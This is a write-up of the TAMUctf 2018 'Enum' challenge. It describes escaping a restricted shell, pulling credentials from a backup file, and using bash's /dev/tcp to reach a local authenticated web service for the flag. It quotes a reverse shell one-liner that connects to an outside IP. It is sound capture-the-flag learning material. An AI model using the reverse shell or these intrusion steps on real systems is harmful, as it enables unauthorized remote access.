+++
title = "Enum"
description = "TAMUctf 2018 - MISC (150 pts)"
keywords = "MISC, socket, WriteUp, CTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = 2018-02-26T15:00:00+00:00
weight = 0
draft = false
bref = "TAMUctf 2018 - MISC (150 pts)"
toc = true
aliases = [
    "/docs/tamu_2018_enum",
]
+++

TAMUctf 2018: Enum
================

| Event        | Challenge | Category      | Points | Solves     |
|--------------|-----------|---------------|--------|------------|
| TAMUctf 2018 | Enum      | Miscellaneous | 150    | ?          |

### Description

Find the hidden flag.

    ssh tamuctf@shell2.ctf.tamu.edu -p 2222
password: *tamuctf*

### TL;DR

For this challenge ssh credentials were given, the goal is to find the hidden flag.
We first found a file containing credentials. Then a server running on port 9000.
Since we don’t have tool to connect to it (netcat, telnet…), we used built-in socket to communicate with it using the credentials and get the flag.

### Enumeration

When you arrive on the server, the shell is restricted, it is a *rbash*. To get out of it, we use directly the *bash* command which is available.

After a little research, we find an interesting file: */var/backups/.srv.bak*

	Our lazy IT guy hasn't set up our apache server yet, so we have to use some weird snake-server in the meantime.
	Save this file as a backup for the credentials.

	uname: administrator
	passwd: dcVMOlH5e6Hd1LGHXLmWzFhjqMu2/nIP9CXt23aq2CE

So we have credentials to connect to a *snake-server*, we immediately think of a python server.
When listing processes, we find an interesting one:

	0.0 0.0 37988 12360 ? S Feb16 0:06 /usr/bin/python /.administrators/pyserver.py 9000

After a quick *netstat*, a process is listening on port 9000.

It is now necessary to succeed in interacting with him, knowing that there is no tool in the machine to do it (*netcat*, *telnet*...).
We try to access to it from the outside, but the port is filtered.

### Find a way to communicate

By looking on how to communicate with the server, I'm thinking back to this reverse shell:

	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

After searching about that, I finally find *[https://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip](https://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip)*

Which gives us:

	exec 3<>/dev/tcp/127.0.0.1/9000
	echo "GET / HTTP/1.1" 1>&3
	cat <&3

	HTTP/1.0 401 Unauthorized
	Server: SimpleHTTP/0.6 Python/2.7.12
	Date: Sun, 18 Feb 2018 14:04:00 GMT
	WWW-Authenticate: Basic realm="Test"
	Content-type: text/html

	no auth header received

There is a basic authentication on the service, so we base64'ize the credentials recovered during the enumeration:

	administrator:dcVMOlH5e6Hd1LGHXLmWzFhjqMu2/nIP9CXt23aq2CE
	YWRtaW5pc3RyYXRvcjpkY1ZNT2xINWU2SGQxTEdIWExtV3pGaGpxTXUyL25JUDlDWHQyM2FxMkNF

Then we forge the http request to authenticate:

	exec 3<>/dev/tcp/127.0.0.1/9000
	echo -e "GET / HTTP/1.1\r\nhost: 127.0.0.1\r\nAuthorization: Basic YWRtaW5pc3RyYXRvcjpkY1ZNT2xINWU2SGQxTEdIWExtV3pGaGpxTXUyL25JUDlDWHQyM2FxMkNF\r\nConnection: close\r\n\r\n" >&3
	cat <&3

### Flag

The flag was **gigem{pivot_piv0t_P1V0T_20975430987aff92qf89qf}**

DrStache
